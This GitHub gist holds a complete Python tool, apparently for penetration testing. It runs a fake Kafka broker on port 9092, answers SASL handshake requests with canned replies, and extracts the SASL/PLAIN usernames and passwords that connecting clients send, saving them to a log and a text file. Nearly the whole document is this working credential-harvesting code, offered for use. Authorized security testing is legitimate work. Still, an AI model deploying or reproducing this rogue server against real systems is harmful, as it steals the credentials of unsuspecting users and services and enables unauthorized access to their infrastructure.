Skip to content

Instantly share code, notes, and snippets.

@X-Cotang
Created December 15, 2025 07:48
Show Gist options
  • Select an option

  • Save X-Cotang/fcf1ac367f2b4a1c76a83402d796dbcf to your computer and use it in GitHub Desktop.

Select an option

Save X-Cotang/fcf1ac367f2b4a1c76a83402d796dbcf to your computer and use it in GitHub Desktop.
Fake Kafka server that records the SASL/PLAIN usernames and passwords sent by connecting clients (for authorized penetration testing).
#!/usr/bin/env python3
import socket
import struct
import threading
import logging
from datetime import datetime
# Configure the root logger once, at import time: INFO and above are emitted,
# each record prefixed with its timestamp and severity.
logging.basicConfig(
    format='%(asctime)s - %(levelname)s - %(message)s',
    level=logging.INFO,
)
class KafkaAuthCapture:
    """TCP listener that records SASL/PLAIN credentials sent by Kafka clients.

    The server accepts connections, answers SASL handshake / authenticate
    requests (API keys 17 and 36) with fixed responses, and scans every
    received chunk for a ``username\\0password`` pair. Captured pairs are
    logged, kept in ``captured_creds`` and appended to ``output_file``.

    Intended for authorized security testing only.
    """

    def __init__(self, host='0.0.0.0', port=9092,
                 output_file='captured_credentials.txt'):
        """Store the listen address and the path captured credentials go to.

        Args:
            host: Interface to bind to.
            port: TCP port to listen on.
            output_file: Text file that captured credentials are appended to.
        """
        self.host = host
        self.port = port
        self.output_file = output_file
        self.server = None  # listening socket, created by start()
        self.captured_creds = []  # one dict per captured credential pair

    def parse_sasl_handshake(self, data):
        """Report whether *data* starts with a SASL-related request header.

        Reads a big-endian 32-bit length followed by a 16-bit API key and
        logs both.

        Returns:
            True when the API key is 17 or 36; None otherwise (including
            when *data* is shorter than 8 bytes or cannot be parsed).
        """
        try:
            if len(data) < 8:
                return None
            length, api_key = struct.unpack_from('>IH', data)
            logging.info(f"Received API Key: {api_key}, Length: {length}")
            if api_key in (17, 36):
                return True
        except Exception as e:
            logging.error(f"Parse error: {e}")
        return None

    @staticmethod
    def _looks_like_credential(username, password):
        """Return True when both strings are non-empty and fully printable."""
        return (bool(username) and bool(password)
                and username.isprintable() and password.isprintable())

    @staticmethod
    def _make_credentials(username, password):
        """Build the credential record returned by parse_sasl_plain."""
        return {
            'authzid': '',
            'username': username,
            'password': password,
            'timestamp': datetime.now().isoformat()
        }

    def parse_sasl_plain(self, data):
        """Try to extract a ``username\\0password`` pair from *data*.

        Two strategies are tried in order:

        1. If byte 4 is NUL, treat everything after it as
           ``username\\0password`` (a 4-byte prefix followed by a token whose
           leading field is empty).
        2. Otherwise scan for any two adjacent NUL-delimited fields that both
           decode as printable UTF-8.

        Both strategies are heuristics and only accept non-empty, printable
        fields. Without that check in strategy 1, any request header whose
        fifth byte is zero was reported as a credential pair.

        Returns:
            A dict with keys ``authzid``, ``username``, ``password`` and
            ``timestamp``, or None when nothing credential-like is found.
        """
        try:
            # Strategy 1: 4-byte prefix, NUL, then "username NUL password".
            if len(data) >= 5 and data[4:5] == b'\x00':
                parts = data[5:].split(b'\x00')
                if len(parts) >= 2:
                    username = parts[0].decode('utf-8', errors='ignore')
                    password = parts[1].decode('utf-8', errors='ignore')
                    # A zero at offset 4 is also the high byte of a small
                    # API key, so validate before trusting this layout.
                    if self._looks_like_credential(username, password):
                        return self._make_credentials(username, password)

            # Strategy 2: look at every pair of consecutive NUL-delimited
            # fields and accept the first pair that is printable text.
            nulls = [pos for pos, byte in enumerate(data) if byte == 0]
            for idx in range(len(nulls) - 1):
                user_raw = data[nulls[idx] + 1:nulls[idx + 1]]
                # The password runs to the next NUL, or to the end of data
                # when there is no further NUL.
                pass_end = nulls[idx + 2] if idx + 2 < len(nulls) else len(data)
                pass_raw = data[nulls[idx + 1] + 1:pass_end]
                if not user_raw or not pass_raw:
                    continue
                try:
                    username = user_raw.decode('utf-8')
                    password = pass_raw.decode('utf-8')
                except UnicodeDecodeError:
                    continue
                if self._looks_like_credential(username, password):
                    return self._make_credentials(username, password)
        except Exception as e:
            logging.error(f"SASL parse error: {e}")
        return None

    def send_response(self, client, api_key):
        """Send the canned reply for *api_key* to *client*.

        Each reply is a 4-byte big-endian length followed by a fixed body.
        Nothing is sent for API keys other than 17 and 36. Send failures are
        logged, not raised.

        NOTE(review): the leading 32-bit zero of each body is presumably the
        response correlation ID and is not taken from the request; the field
        layouts are kept exactly as originally written - confirm against the
        Kafka protocol guide.
        """
        try:
            if api_key == 17:
                mechanism = b'PLAIN'
                # 32-bit 0, 16-bit 0, 32-bit count of 1, then one
                # length-prefixed mechanism name.
                response = struct.pack('>IHIH', 0, 0, 1, len(mechanism)) + mechanism
            elif api_key == 36:
                # 32-bit 0, 16-bit 0, 32-bit 0.
                response = struct.pack('>IHI', 0, 0, 0)
            else:
                return
            # sendall() retries until the whole buffer is written; send()
            # may transmit only part of it.
            client.sendall(struct.pack('>I', len(response)) + response)
        except Exception as e:
            logging.error(f"Send response error: {e}")

    def _record_credentials(self, peer, creds):
        """Log *creds*, remember them in memory and append them to the file."""
        logging.warning(f"\n{'='*60}")
        logging.warning(f"[!] CREDENTIALS CAPTURED from {peer}")
        logging.warning(f" Username: {creds['username']}")
        logging.warning(f" Password: {creds['password']}")
        logging.warning(f" Time: {creds['timestamp']}")
        logging.warning(f"{'='*60}\n")
        self.captured_creds.append({
            'client': peer,
            **creds
        })
        # Single write per record so entries written by different client
        # threads are less likely to interleave.
        entry = (
            f"\n[{creds['timestamp']}] {peer}\n"
            f"Username: {creds['username']}\n"
            f"Password: {creds['password']}\n"
            + "-" * 60 + "\n"
        )
        with open(self.output_file, 'a', encoding='utf-8') as f:
            f.write(entry)

    def handle_client(self, client, addr):
        """Handle a connection from a client.

        Reads chunks of up to 4096 bytes until the peer closes the
        connection. Each chunk is answered if it looks like a SASL request
        and is then scanned for credentials. The socket is always closed on
        exit; errors are logged, not raised.

        NOTE(review): each recv() chunk is treated as one complete message;
        requests split across chunks are not reassembled.
        """
        peer = f"{addr[0]}:{addr[1]}"
        logging.info(f"[+] New connection from {peer}")
        try:
            while True:
                data = client.recv(4096)
                if not data:
                    break
                logging.debug(f"Raw data: {data[:100].hex()}")
                if self.parse_sasl_handshake(data):
                    api_key = struct.unpack('>H', data[4:6])[0]
                    self.send_response(client, api_key)
                creds = self.parse_sasl_plain(data)
                if creds:
                    self._record_credentials(peer, creds)
        except Exception as e:
            logging.error(f"Client handler error: {e}")
        finally:
            client.close()
            logging.info(f"[-] Connection closed from {peer}")

    def start(self):
        """Bind, listen and serve clients until interrupted.

        Each accepted connection is handled on its own daemon thread.
        Ctrl-C prints the capture summary; the listening socket is closed
        on every exit path.
        """
        try:
            self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.server.bind((self.host, self.port))
            self.server.listen(5)
            logging.info(f"[*] Kafka Auth Capture Server listening on {self.host}:{self.port}")
            logging.info("[*] Waiting for connections...")
            logging.info(f"[*] Captured credentials will be saved to: {self.output_file}\n")
            while True:
                client, addr = self.server.accept()
                client_thread = threading.Thread(
                    target=self.handle_client,
                    args=(client, addr)
                )
                # Daemon threads do not keep the process alive at shutdown.
                client_thread.daemon = True
                client_thread.start()
        except KeyboardInterrupt:
            logging.info("\n[*] Shutting down server...")
            self.print_summary()
        except Exception as e:
            logging.error(f"Server error: {e}")
        finally:
            if self.server:
                self.server.close()

    def print_summary(self):
        """Print every credential captured during this run to stdout."""
        if self.captured_creds:
            print(f"\n{'='*60}")
            print(f"SUMMARY - Total captured: {len(self.captured_creds)} credentials")
            print(f"{'='*60}")
            for i, cred in enumerate(self.captured_creds, 1):
                print(f"\n{i}. Client: {cred['client']}")
                print(f" Username: {cred['username']}")
                print(f" Password: {cred['password']}")
                print(f" Time: {cred['timestamp']}")
            print(f"\n{'='*60}\n")
        else:
            print("\n[*] No credentials captured\n")
# Script entry point: show the banner, then serve on all interfaces at the
# default Kafka port until interrupted.
if __name__ == '__main__':
    banner = """
╔══════════════════════════════════════════════════════╗
║ Kafka Authentication Capture Tool ║
║ For Penetration Testing - Use Responsibly ║
╚══════════════════════════════════════════════════════╝
"""
    print(banner)
    server = KafkaAuthCapture(host='0.0.0.0', port=9092)
    server.start()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment